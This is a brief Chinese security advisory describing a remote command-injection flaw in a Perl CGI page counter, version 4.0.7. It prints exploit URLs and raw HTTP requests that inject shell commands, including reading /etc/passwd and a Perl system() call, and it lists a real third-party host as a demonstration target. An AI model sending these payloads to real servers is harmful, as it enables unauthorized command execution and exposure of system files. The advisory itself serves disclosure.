涉及程序: popular CGI web page access counter 4.0.7 描述: popular CGI web page access counter 4.0.7 允许 远程 执行 任意命令 详细: popular CGI web page access counter 4.0.7 版由于不检查用户输入,导致 允许 用户 执行 任意命令, 。用户所拥有
涉及程序:
这个计数器包含用perl script写成的"counter",和与"counter"多重连接的counter-old,counterfiglet,counterfiglet-ord, counterbanner, 和 counterbanner-ord.
以下例子说明此漏洞如何可以被利用.
使用如下URL
------------------
http://www.xxx.com/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
Passing commands in a variable
------------------------------
> telnet web-server www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/passwd
> telnet web-server www
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV"); HTTP/1.0
X: echo;id;uname -a;w
国外示范站点
http://seal.gatech.edu/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;ls
解决方案:
使用其它计数器。